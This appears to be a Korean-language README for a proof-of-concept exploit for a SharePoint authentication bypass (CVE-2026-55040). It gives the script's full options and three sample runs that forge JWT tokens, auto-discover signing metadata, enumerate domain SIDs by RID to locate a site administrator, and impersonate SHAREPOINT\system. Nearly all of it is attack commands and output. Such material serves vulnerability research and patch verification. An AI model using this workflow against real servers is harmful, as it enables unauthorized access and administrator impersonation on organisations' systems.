
Microsoft SharePoint CVE-2026-55040용 개념 증명 익스플로잇으로, JWT 토큰을 위조하고 인증을 우회하며 메타데이터를 자동으로 발견하고 SID 열거를 통해 사이트 관리자를 가장합니다.
CVE-2026-55040.py는 SharePoint 인증 우회 취약점인 CVE-2026-55040을 활용하기 위한 개념 증명(PoC) 스크립트입니다.
전체 기술 분석은 Rapid7 분석을 참조하십시오.
$ python CVE-2026-55040.py --help
usage: CVE-2026-55040.py [-h] [--target TARGET] [--host HOST] [--x5t X5T] [--realm REALM] [--sid SID] [--upn UPN]
[--auto-upn] [--username USERNAME] [--rid RID] [--max-rid MAX_RID] [--port PORT]
[--domain-ip DOMAIN_IP] [--http]
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
options:
-h, --help show this help message and exit
--target TARGET Target IP address (auto-discovers all params)
--host HOST SharePoint hostname (auto-discovered)
--x5t X5T STS signing cert x5t (auto-discovered from metadata)
--realm REALM SharePoint realm GUID (auto-discovered from metadata)
--sid SID Windows SID for identity (auto-discovered via LSARPC)
--upn UPN UPN for identity, e.g. [email protected] (alternative to --sid, no SMB needed)
--auto-upn Auto-construct UPN from HTTPS cert domain (no SMB needed; derives host from cert)
--username USERNAME Username for --auto-upn (default: administrator)
--rid RID Specific RID to use (skips iteration). If not set, auto-SID iterates 500 then 1000+ to find a
site admin
--max-rid MAX_RID Max RID to try during auto-SID iteration (default: 10000)
--port PORT Non-standard port for target web service (default: 443 for HTTPS, 80 for HTTP)
--domain-ip DOMAIN_IP
Domain controller IP for SMB/LSARPC discovery (default: same as --target). Use when the DC is
a different system than the SharePoint server
--http Use HTTP instead of HTTPS (disables auto-discovery; must supply --host, --x5t, --realm, --sid
manually)
--host를 통해 대상 호스트 이름만 제공하면, 위조된 JWT는 NT AUTHORITY\LOCAL SERVICE 사용자에 대한 AccessToken 명명 ID(naming identity)를 사용합니다.
참고: 인증 우회는 성공하지만 AccessToken ID로 접근할 수 있는 리소스는 제한적입니다. 예를 들어 /_api/contextinfo와 같은 일부 엔드포인트에는 접근할 수 없지만(아래 "폼 다이제스트 얻기" 작업 중에 표시됨), /_vti_bin/sites.asmx와 같은 다른 보호된 리소스에는 접근할 수 있습니다. 인증 우회가 연결되는 다음 취약점에 따라 AccessToken 명명 ID를 사용하는 것이 실행 가능할 수 있습니다.
$ python3 CVE-2026-55040.py --host WIN-FG3H2SKPOTA.fritz.box
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: 84eAgzfNOtqgEPs8usO4Jr_0Zf8
[*] realm: 0e2603c3-5eef-4d0f-90ca-53ee9a7729a4
[+] No --domain-ip/--sid/--upn provided; using local service identity
[+] Targeting: https://WIN-FG3H2SKPOTA.fritz.box
[2] Forging JWT token...
[+] Token forged (1025 bytes)
[3] Obtaining form digest...
[-] Failed to get digest. Response: {"odata.error":{"code":"-2147024891, System.UnauthorizedAccessException","message":{"lang":"en-US","value":"Access denied. You do not have permission to perform this action or access this resource."}}}
--host를 통해 대상 호스트 이름과 해당 도메인 컨트롤러의 --domain-ip를 제공하면, 위조된 JWT는 Windows SID(보안 식별자) 사용자에 대한 urn:office:idp:activedirectory 명명 ID를 사용합니다. 사이트 관리자를 찾기 위해 이 사용자의 SID가 자동으로 검색됩니다.
SID를 미리 알고 있다면 --domain-ip를 생략하고 --sid를 통해 알고 있는 SID를 전달할 수 있습니다.
$ python3 -m pipx install impacket
$ python3 CVE-2026-55040.py --host WIN-FG3H2SKPOTA.fritz.box --domain-ip 192.168.86.11
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: 84eAgzfNOtqgEPs8usO4Jr_0Zf8
[*] realm: 0e2603c3-5eef-4d0f-90ca-53ee9a7729a4
[+] Discovering domain SID via SMB (192.168.86.11)...
[*] domain_sid: S-1-5-21-4203888158-2793536450-3921675298 (will iterate RIDs)
[*] DC differs from target; will discover SharePoint hostname separately
[+] Targeting: https://WIN-FG3H2SKPOTA.fritz.box
[+] Iterating RIDs to find site admin (500, then 1000-10000)...
[-] RID 500: no valid user
[-] RID 1000: no valid user
[-] RID 1050: no valid user
[-] RID 1100: no valid user
[-] RID 1150: no valid user
[-] RID 1200: no valid user
[-] RID 1250: no valid user
[-] RID 1300: no valid user
[-] RID 1350: no valid user
[-] RID 1400: no valid user
[-] RID 1450: no valid user
[-] RID 1500: no valid user
[-] RID 1550: no valid user
[-] RID 1600: no valid user
[+] RID 1602: i:0#.w|testdomain2\testuser1 (testuser1)
[+] RID 1605: SHAREPOINT\system (System Account) ** SITE ADMIN **
[+] Found site admin at RID 1605, stopping scan
[+] Using site admin SID: S-1-5-21-4203888158-2793536450-3921675298-1605
[+] Login: SHAREPOINT\system
[2] Forging JWT token...
[+] Token forged (1040 bytes)
[3] Obtaining form digest...
[+] Digest obtained.
--host를 통해 대상 호스트 이름과 알려진 사이트 사용자의 --upn을 제공하면, 위조된 JWT는 지정된 UPN(사용자 계정 이름)에 대한 urn:office:idp:activedirectory 명명 ID를 사용합니다.
$ python3 CVE-2026-55040.py --host WIN-79B765S1R4G --upn [email protected]
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: a1g8DVePm6FB892C0AAB23-Wl7M
[*] realm: 66aaa1e2-b658-41c4-8911-ff2d5bab5423
[+] Targeting: https://WIN-79B765S1R4G
[2] Forging JWT token...
[+] Token forged (1047 bytes)
[3] Obtaining form digest...
[+] Digest obtained.